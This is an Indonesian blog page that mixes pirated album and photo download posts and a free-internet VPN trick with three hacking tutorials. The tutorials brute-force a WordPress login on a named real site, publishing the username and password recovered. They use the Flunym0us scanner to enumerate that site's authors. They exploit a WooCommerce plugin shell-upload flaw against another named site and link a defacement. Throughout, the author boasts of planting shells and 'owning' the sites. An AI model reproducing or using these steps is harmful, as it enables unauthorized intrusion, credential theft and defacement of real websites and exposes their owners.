Download 4th Single JKT48 - Manatsu Sounds Good ! + MV

Kali ini saya akan share Single terbaru JKT48 yaitu Manatsu Sounds Good . Just share, buat yang gak mampu beli albumnya :p . gak usah protes :p . Oke langsung saja ya :D

Berikut list nya :

JKT48 - 01. Manatsu no Sounds Good! - Musim Panas Sounds Good!

JKT48 - 02. BINGO!

JKT48 - 03. Kimi to Boku no Kankei - Hubungan Kau Dan Aku

JKT48 - 04. Manatsu no Sounds Good! - Summer Love Sounds Good! (English Ver.)

MV JKT48 - Manatsu no Sounds Good! - Musim Panas Sounds Good!



nah, untuk file musik nya silahkan download di sini Download Full Album Manatsu no Sounds Good JKT48

Password RAR : madura-cyber

Sementara untuk MV nya silahkan download disini Download MV JKT48 - Manatsu no Sounds Good !



Oke, sekian postingan kali ini, semoga bermanfaat ;)

Hack Wordpress Dengan Python Wordpress BruteForce

Kali ini saya akan share tutorial bruteforce Wordpress dengan Python :D

Cukup mudah tapi butuh kesabaran :)

Oke langsung saja ikuti langkah-langkahnya :

Sebelumnya, jika sobat menggunakan Windows, harus terinstall Python Trelebih dahulu :D

Setelah itu, copas script berikut dan save dengan formay .py

Tools Python Wordpress BruteForce

Wordlist yang diletakkan satu folder dengan File Python nya.

Untuk wordlist bisa cari sendiri atau pakai punya saya

Wordlists by Nabilaholic404



Setelah itu, tentukan target. Terserah mau acak atau mau pentest web yang sudah ditentukan.

Ketahui dulu user yang digunakan di website tersebut, agar nanti proses bruteforce tidak sia-sia. Untuk mengetahui daftar user di web target bisa kalian scan dengan Flunym0us. Untuk yang belum tau, baca tentang flunym0us di :

Flunym0us, Vulnerability Scanner for Wordpress and Moodle



Sebagai bahan tutorial, target saya adalah http://www.adriannecurry.org/

Setelah di cek dengan Flunym0us, user dari web tersebut adalah "adamjohn" . Jadi saat melakukan bruteforce user yang kita masukkan adalah "adamjohn"



Oke, langsung saja ke step yang pertama.

nb : saya meletakkan file python nya di C:\tools\wpbf.py



Buka CMD

Ketik cd\tools

lalu ketik command berikut :

[namafile].py -h http://[situstarget]/wp-login.php -u [username -P [wordlist].txt

Contoh :

wpbf.py -h http://www.adriannecurry.org/wp-login.php -u adamjohn -P akicha.txt

Tunggu proses bruteforce selesai. kadang lama, kadang cepet, kadang gagal . Berdoa saja :v

Nah, tuh udah finish ! :v

Username : adamjohn

Password : michael123



Kita coba login di webnya :

http://www.adriannecurry.org/wp-login.php



Dan dorrrr !! Welcome to Admin Page :p

Kalo sudah seperti itu ja terserah mau diapan :p

kalo lagi iseng ya pasang shell, hajar index nya :v

http://www.adriannecurry.org owned :p

Mirror





Berikut tutorial upload shell di wordpress :

Cara Upload Shell di Wordpress Lewat Theme Editor

Tutorial Upload Shell di Wordpress via Plugins Editor

Flunym0us, Vulnerability Scanner for Wordpress and Moodle

Kali ini saya share tools yang biasa digunakan untuk melakukan scan pada web CMS Wordpress dan Moodle.

Mungkin sudah banyak sih yang tau, namanya Flunym0us. Yang udah tau lewat aja, yang belum tau monggo disimak :p

Pengenalan :

Flunym0us adalah Vulnerability Scanner pada situs Wordpress dan Moodle yang dibuat oleh Flu Project Team.

Tools ini berbasis python. jadi yang pakek Windows harus install Python dulu. :D



Pengoperasian :



-h, --help: Show this help message and exit

-wp, --wordpress: Scan WordPress site

-mo, --moodle: Scan Moodle site

-H HOST, --host HOST: Website to be scanned

-w WORDLIST, --wordlist WORDLIST: Path to the wordlist to use

-t TIMEOUT, --timeout TIMEOUT: Connection timeout

-r RETRIES, --retries RETRIES: Connection retries

-p PROCESS, --process PROCESS: Number of process to use

-T THREADS, --threads THREADS: Number of threads (per process) to use





Fitur :



[+] http user-agent hijacking

[+] http referer hijacking

[+] Search Wordpress Version

[+] Search Wordpress Latest Version

[+] Search Version of Wordpress Plugins

[+] Search Latest Version of Wordpress Plugins

[+] Search Path Disclosure Vulnerabilities

[+] Search Wordpress Authors



Kek gini nih tampilannya :

Fiturnya banyak kan ? :D

nah, salah satu fitur favorit ane adalah Search Wordpress Authors.

Kali ini saya akan menjelaskan fitur tersebut :D

Kesalahan yang kadang dilakukan oleh para attacker ketika melakukan bruteforce adalah asal ngisi username. kadang mereka asal isi dengan "admin" . Iya kalo usernya admin, kalo enggak, buang-buang waktu doang kan :p .

Sebagai contoh liat ss dibawah :

Ketika dimasukkan user "admin" , hasilnya invalid :p

Kalo misalmau dibruteforce pake user "admin" hasilnya tetap nihil kan :v

Makanya harus di scan dulu :D

Buka Flunym0us .

Caranya :

Disini ane meletakkan tools nya di C:\tools\scanwp\sc.py < file nya ane beri nama sc.py

Buka CMD

Ketik cd\tools\scanwp

Ketik lagi sc.py

maka Flunym0us akan terbuka.

Command nya adalah

[namafile].py -H http://[situstarget]/ -wp -w wp-plugins.lst -t 60 -r 1 -p 2 -T 2



Contoh:

sc.py -H http://www.adriannecurry.org/ -wp -w wp-plugins.lst -t 60 -r 1 -p 2 -T 2



Dan tunggu proses scanning :p

Siip. Darisitu kita tau authornya adalah "adamjohn"

Coba kita test di websitenya :

User "adamjohn" valid .

kalo mau bruteforce berarti usernamenya "adamjohn" bukan "admin" :p



bagaimana ? Tertarik ?

kalo tertarik kalian bisa download Di Sini

Untuk fitur-fitur lain silahkan coba-coba sendiri.



Oke, sekian tutor kali ini :p

Maaf kalau tutornya kepanjangan, saya hanya berusaha biar yang belum paham cepet paham.

Jika ada yang belum jelas, silahkan komentar :D

Download 400+ Foto Aki Takajo JKT48

Kali ini saya mau share Pict oshi saya di JKT48. Siapa lagi kalo bukan Akicha . Mungkin ada yang butuh :p

Langsung saja ya. Ini jumlah fotonya ada 400 lebih, atau tepatnya 407 foto.



Ane kasih sedikit deh preview nya :v

Udah itu aja.

Kalo mau download semuanya klik aja link dibawah :v

Download 400+ Pict Aki Takajo JKT48



Sekian dan semoga bermanfaat

Internet Gratis Dengan VPN Di PC Laptop Dan HP Android

Assalamualaikum...

VPN adalah singkatan dari Virtual Private Network, yang berarti adalah jalur khusus atau private untuk mengakses internet dari jaringan publik. Namun VPN membuat koneksi terlihat sebagai "anonymous atau tanpa identitas" di internet. VPN memberikan keleluasaan dalam mengakses internet dan juga membuat koneksi lebih stabil. Jadi dengan memanfaatkan jaringan tersebut kita bisa menggunakannya untuk akses internet secara gratis tanpa pulsa dan tanpa kuota. mari kita simak aja :)

Status : Testes & Worked for Provider 3 AoN, XL dan Telkomsel via HP & Laptop

Khusus HP Android (Rooted)

Donwload | DroidVPN

Register | Here

Pertama sobat diharuskan mendaftar dulu untuk mendapatkan akun free.

Kemudian Install DroidVPN di perangkat Android sobat lalu jalankan aplikasinya. dan login akun yg sudah sobat daftarkan tadi.

Untuk selengkapnya silahkan Baca Disini


Khusus PC / Laptop

PD-Proxy | Download

Seperti sebelumnya, sobat diharuskan mendaftar akunnya terlebih dahulu..

Kemudian install aplikasinya dan jalankan.. jika ada muncul perintah buat install driver, iyakan aja :) silahkan masukan username dan password sobat :)

Untuk Selengkapnya silahkan Baca Disini

Manfaat Menggunakan VPN

Keamanan - VPN memberikan tingkat keamanan tertinggi menggunakan enkripsi canggih dan protokol otentikasi yang melindungi data dari akses yang tidak sah.

Anonymous Surfing - VPN membuat akses internet secara anonim dan mengamankan koneksi Internet dengan memberikan alamat ip baru sehingga terhindar dari pelacakan,

WiFi Security - Keamanan akses internet di Area Hotspot sehingga lalu lintas data tidak bisa dicuri, atau dimanipulasi karena data terencripsi..

Untuk Trik Internet Gratis lainnya klik DISINI

Sekian saja, moga bermanfaat :)

UPDATE : TRIK SUDAH TIDAK BISA DIGUNAKAN LAGI

Content Creator : Onix AQua

Download Album Avril Lavigne | Avril Lavigne New Album 2013

Hallo semuanya :D

Assalamualaikum :D

Hampir seminggu tidak posting karena banyak tugas sekolah dan juga latihan senam untuk nilai praktek olahraga :( . Oke, kali ini saya akan share Album terbaru Avril yaitu "Avril Lavigne" .Udah lama sih punya, cuman ya baru sempet share soalnya ya itu tadi, banyak tugas. Wakakakakaka :v

Di album ini ada tigabelas lagu.

Berikut tracklistnya :

1. Avril Lavigne � Rock n Roll


2. Avril Lavigne � Here�s to Never Growing Up


3. Avril Lavigne � 17


4. Avril Lavigne � Bitchin� Summer


5. Avril Lavigne � Let Me Go Ft. Chad Kroeger


6. Avril Lavigne � Give You What You Like


7. Avril Lavigne � Bad Girl Ft. Marilyn Manson


8. Avril Lavigne � Hello Kitty


9. Avril Lavigne � You Ain�t Seen Nothin� Yet


10. Avril Lavigne � Sippin� On Sunshine


11. Avril Lavigne � Hello Heartache


12. Avril Lavigne � Falling Fast


13. Avril Lavigne � Hush Hush

Yang mau download, ini link nya :

Download Album Avril Lavigne | Avril Lavigne New Album 2013

Sekian dan semoga bermanfaat :D

Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability

Oke, kali ini saya mau share exploit yang baru ditemukan kemarin yaitu Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability. caranya cukup mudah kok. Langsung saja ikuti tutorialnya :

Bahan-bahan :



HTML Exploiter Download Disini | save dengan format .html



Vulnerability :

[localhost]/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php

Dork :

use your brain bitch :p

Shell Location :

[localhost]/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/[randomname].php



Langkah-langkah :

Oke, langsung saja nyelem ke google nyari target vuln. :p

Contoh target saya adalah http://mbrinformatique.com/

Ubah url nya menjadi

http://mbrinformatique.com/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php

Jika error, berarti vuln :D

Langkah kedua, buka HTML Exploiter diatas dan edit bagian http://127.0.0.1/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php dengan web yang vuln.

save kembali lalu buka lewat browser. :p

nah tuh, upload shell nya lewat situ. maka kalo sudah sukses kalian akan mendapatkan nama acak. Misal :

1384522165528621b5f41fe.php

maka letak shell kalian ada di

[localhost]/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/[randomname].php



Contoh :

http://mbrinformatique.com/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/1384522165528621b5f41fe.php

Kalo sudah seperti ituya terserah mau diapain -_-

http://mbrinformatique.com/devil.html

Mirror



Thanks to founder of this exploit :

Bebyyers404 | JKT48 CYBER TEAM - Black Devil Crew



Sekian tutorial kali ini semoga bermanfaat :)